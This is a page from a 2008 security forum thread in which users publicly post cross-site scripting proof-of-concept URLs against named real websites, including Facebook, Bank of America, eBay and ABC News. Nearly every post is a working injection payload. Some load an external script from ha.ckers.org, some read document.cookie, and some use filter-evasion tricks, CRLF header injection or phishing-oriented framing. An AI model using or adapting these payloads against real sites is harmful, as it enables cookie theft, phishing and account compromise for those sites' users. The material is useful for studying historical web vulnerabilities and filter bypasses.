Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...5152535455565758596061...LastNext
Current Page: 56 of 65
Re: So it begins
Posted by: maluc
Date: February 14, 2008 12:20AM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://secure.facebook.com/add_poll.php&price_per_response=50&max_responses=200&cc_name=john+smith&cc_cardType=86&cc_creditCardNumber=4123412312341234&cc_expMonth=1&cc_expYear=2009&cc_countryCode=US&cc_street=qwer%22%3E%3Cscript%20src%3D%22http://ha.ckers.org/s.js%22%3E%3C/script%20vvvvv%3Ee&cc_city=&cc_state=&cc_zip=&cc_save_cc=1&cc_showSave=1&cc_save_required=cc_save_required&finalize_submit=Place+Order&poll_question=question1&target_sex=0&target_age=0&target_keyword_type=0&network=0&max_responses=200&price_per_response=50&n_college=-1&n_geo=-1&keyword_selector_input=0&keyword_selector_label=&answer_1=answer1&answer_2=answer2 secure.facebook.com

Not all that useful at first glance, aside from phishing.. because of facebook's policy of fragmenting their site into different subdomains. There's not much of use in http://secure.facebook.com and http://facebook.com .

*Note - you may need to be logged in to view it. YMMV

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: February 14, 2008 12:55AM

I don't know that this has also been live a full year while undisclosed - but atleast 7 months.

https://epreferences.bankofamerica.com/asbs/servlet/SS?F=1410408&X=40058617572&T=40058617572&Z=asdf%22%3E%3Czz%20name%3D'zz'%20id%3D'0'%3E%3C/zz%3E%3Cscript%3Ex%3Ddocument.getElementsByName%28%27zz%27%29%5B0%5D;if(x.id%3D%3D0)%7Balert%28%271%20Phish%27%29;x.id%3D1;%7Delse%20if(x.id%3D%3D1)%7Bx.id%3D2;alert('2%20Phish');%7Delse%20alert('Red%20Phish%20Blue%20Phish')%3C/script%3E%3Cz&CID=11268:11268_2

Also included is a nifty javascript snippet to make three identical copies of the XSS execute 3 different paths of code. Particularly useful when you only want one instance of your XSS to execute, and have all subsequent copies do nothing.

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: February 14, 2008 01:02AM

http://pages.ebay.com/help/tp/items-authentication.html?fromFeature=%3Cbody%20onload%3Deval(%22ale%22%2B%22rt(docu%22%2B%22ment.cookie)%22)%3E

I believe ebay employs a blacklist on keywords like 'document.cookie' and 'script' and 'alert('

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: February 14, 2008 06:57AM

Hi maluc! what's up? long time no see.

nice ones btw.

Options: ReplyQuote
Re: So it begins
Posted by: Gareth Heyes
Date: February 14, 2008 07:10AM

Quote

maluc Wrote:
I believe ebay employs a blacklist on keywords
like 'document.cookie' and 'script' and 'alert('

lol do they know anything :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: February 15, 2008 08:39PM

trev Wrote:
-------------------------------------------------------
> I didn't look at thelookandsoundofperfect.com
> until now. Here you have it:
>
> http://www.thelookandsoundofperfect.com/popCover.p
> hp?img=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E
> %3Cdiv%20dummy=%22
>
> Here is how you can load any Flash movie into
> their content pane (maybe I should call this
> "Flash Injection" :)
>
> http://www.thelookandsoundofperfect.com/index.php?
> page=/../../_swf/nav_xml_v3.swf?
>
> Now you only need to find a redirect on their site
> to inject a video from a third-party site. And
> here are some scripts you might want to play
> around with (don't seem vulnerable however):
>
> http://www.thelookandsoundofperfect.com/_dev/_lib/
> process_stf.php?yname=me&yemail=me@example.com&fna
> me=him&femail=him@example.com
> http://www.thelookandsoundofperfect.com/_dev/_lib/
> process_signup.php?email=me@example.com
>
> Also, XSS in a page they are linking to:
>
> http://www.soundandvisionmag.com/article.asp?secti
> on_id=60&article_id=2207&page_number=1asdf%22%2Bal
> ert('xss')%2B%22



Pfffff re-hashing the same old shit, clever guy you are, it's not a bug its feature! go look it up! its afeature, a feature! not a bug, a feature1!!!!

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: February 16, 2008 12:55AM

hiya Ronald,
research wasn't paying the bills.. so i had to limit it alot for a while :T

it's good to be back though, missed this place. i'll try to keep contributing ^^

Must be logged in: http://www.crunchyroll.com/inbox?q=asdf%3Cbody%20onload%3D%22alert('XSS')%22%3Eqwer

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: February 18, 2008 01:13PM

http://www.buy.com/retail/searchresults.asp?qu=%27%29%3Balert%28%2Fxss%2F%29%3B%2F%2F&queryType=home

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins
Posted by: Gareth Heyes
Date: February 18, 2008 01:22PM

@tx

Nice dom xss :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: February 26, 2008 07:18PM

http://www.propeller.com/viewstory/2008/02/26/lauren-cleri-destroys-her-husband-on-moment-of-truth-video/?url=javascript:alert('xss')&frame=true

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: March 11, 2008 08:39PM

So, it's totally expected that when translating a webpage, Javascript will execute in the context of the translator site. But it seems that many sites don't take the time to ensure that the translator is properly sandboxed. Google and Yahoo both display the translation in a frame whose domain does not have access to .google.com or .yahoo.com cookies, but it appears many don't:
http://babelfish.altavista.com/babelfish/trurl_pagecontent?lp=es_en&url=http%3A%2F%2Ftx.lowtechlive.com%2Fs.php
http://www.online-translator.com/url/tran_url.asp?lang=en&url=http%3A%2F%2Ftx.lowtechlive.com%2Fs.php&direction=se&template=General&cp1=NO&cp2=NO&psubmit2.x=39&psubmit2.y=18

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins
Posted by: LinuxPHreak
Date: March 17, 2008 12:06AM

I'm not sure if anyone mentioned this one yet, but bizrate.com has an XSS exploit as well.

Options: ReplyQuote
Re: So it begins
Posted by: LinuxPHreak
Date: March 17, 2008 12:10AM

Wait, I should probabally give the URL that I used:
http://www.bizrate.com/ratings_guide/results__SEARCH_GO--GO__SEARCH_GO.x--342__SEARCH_GO.y--16__cat_id--1__keyword--%3Cscript%3Ealert(%22XSS%22)%3C/script%3E__search_box--1__sfsk--0.html

Options: ReplyQuote
Re: So it begins
Posted by: fragge
Date: March 17, 2008 12:53AM

56 pages of disclosure.. I pity whomever is putting all of this together.

Options: ReplyQuote
Re: So it begins
Posted by: Malkav
Date: March 18, 2008 03:48AM

[ddanchev.blogspot.com]

at least someone is appreciating the work.

----------------------------------------------------------------------------------------------------------------

Those that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety.
--Benjamin Franklin

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: March 23, 2008 06:20PM

I wouldn't have expected it to be that easy... astalavista.com XSS

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://www.astalavista.net/%3Fcmd%3Drec%26act%3Dsend&frmRec_SenderName=%22%3E%3Cscript%3Ealert%28/ouch!/%5B-1%5D%29%3C/script%3E

Options: ReplyQuote
Re: So it begins
Posted by: nav
Date: April 07, 2008 03:48PM

Search security's unsubscribe xss.
http://searchsecurity.techtarget.com/unsubscribeConfirm/1,294679,sid14,00.html?lid=430718&lname=Webc%3Cscript%3Ealert(1)%3C/script%3East+Alert&uid=6149038&ltype=NEWS

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: April 13, 2008 07:47PM

[abcnews.go.com]
XSS: http://abcnews.go.com/search?searchtext=%5C%27%29%3Balert%28document.cookie%29%3Balert%28document.domain%29//&type=

way too much information here: http://64.95.76.58/np6080/search2_alt.cgi?query=a%0a%0db%0a%0d&from=0&to=9&type=video&size=small
and here: http://64.95.76.58/np6080/search2_alt.cgi.bak?query=a%0a%0db%0a%0d&from=0&to=9&type=video&size=small

btw, check out the contents of the DS and DE2 cookies set for the .go.com domain

EDIT: More, more, more http://app.abcnews.go.com/app/setUsernameCookie?appRedirect=http%3A//abcnews.go.com%27%3Balert%28%27XSS%3A%5Cn%5Cn%27%2bdocument.cookie%29%3B//

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 04/14/2008 12:58PM by tx.

Options: ReplyQuote
Re: So it begins
Posted by: shao
Date: April 30, 2008 12:28AM

http://www.galacticimperia.org/imperia/game/register.php?realm=%22%3CSCRIPT%3Ealert(/XSS/)%3C/script%3E - XSS

Options: ReplyQuote
Re: So it begins
Posted by: nEUrOO
Date: April 30, 2008 08:22AM

Just because they sent a nice email (looking for engineers) saying they are "Nous sommes une société haut de gamme dans l’ingénierie Internet." (trans: We are a high quality company in the Internet engineering).

hxxp://www.smile.fr/recherche/(SearchText)/<script>alert("No, you're not!");</script>

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher



Edited 1 time(s). Last edit at 04/30/2008 08:23AM by nEUrOO.

Options: ReplyQuote
Re: So it begins
Posted by: Kyo
Date: May 02, 2008 03:13PM

don't know if this has been posted, but:

http://members.freewebs.com/Directory/viewSites.jsp?query=%3C/script%3E%3Cscript%3Ealert(/now%20this%20is%20just%20sad.%20It%20took%20me%20less%20than%20a%20minute/)%3C/script%3E&x=0&y=0

I was setting up a freewebs account, and I saw the search box, so I figured, why the hell not?

Options: ReplyQuote
Re: So it begins
Posted by: KleverOneR
Date: May 22, 2008 03:33PM

Came across this while testing someone's weblog, could be useful later

https://www.thrivesmart.com/login?to_p=%2Farticles%3Fedit%3Dtrue&to_b=anonymous&_notice=%3Cscript%20type='text/javascript'%3Ealert(document.cookie);%20alert('KleverOneR');%3C/script%3E

Blog of the creators of dictionary.com, thesaurus.com, reference.com:

http://www.lexico.com/blog/index.php?s=%3Cscript+type%3D%27text%2Fjavascript%27%3Ealert%28document.cookie%29%3Balert%28%27KleverOneR%27%29%3B%3C%2Fscript%3E&submit=Go%21



Edited 2 time(s). Last edit at 05/22/2008 03:55PM by KleverOneR.

Options: ReplyQuote
Re: So it begins
Posted by: DoctorDan
Date: May 26, 2008 12:26AM

food.aol.com...
http://tinyurl.com/477eh7

gave me a chuckle

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: May 27, 2008 04:39PM

Pffff... #46 with IQ of 94

http://www.iqleague.com/award/fcT4qLMWuEe9wJqpASG2jw

Options: ReplyQuote
Re: So it begins
Posted by: trev
Date: May 29, 2008 09:02AM

http://trail.motionbased.com/trail/security/login.mb?username.value=%3Cscript%3Ealert('xss')%3C/script%3E

Options: ReplyQuote
Re: So it begins
Date: June 06, 2008 02:14AM

http://doc.bleedingthreats.net/bin/login/Main/WebPreferences?username=&password=&origurl=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

Options: ReplyQuote
Re: So it begins
Date: June 07, 2008 02:20AM

http://www.accessplace.com/redirect.php?redir=http%3A%2F%2Fwww.google.com%0ALocation:javascript:%0A%0A%3Cscript%3Ealert(0)%3C/script%3E

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: June 10, 2008 11:16PM

http://www.pbs.org/kcet/wiredscience/page/search.html?q=%22%3E%3Cscript%3Ealert%28%27hello+mum%27%29%3B%3C%2Fscript%3E

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Date: June 11, 2008 01:43AM

http://www.weather.com/weather/map/interactive/?zoom=6&lat=42&long=-7%22%3E%3Cbody%20onload=alert(1)%206&interactiveMapLayer=radar&plot=true&animation=true

http://www.accuweather.com/us-city-list.asp?zipcode=%22%3E%3Cbody%20onload=alert(1)%20%20x=%22&submit=GO&u=1&partner=accuweather

http://www.intellicast.com/local/default.aspx?query=aaaa%22,%200);alert(1);//

Its raining XSS =oD

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: June 14, 2008 07:07AM

http://technorati.com/account/lost-password?username=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E

C'mon... are fruits able to hang lower?

Options: ReplyQuote
Pages: PreviousFirst...5152535455565758596061...LastNext
Current Page: 56 of 65


Sorry, only registered users may post in this forum.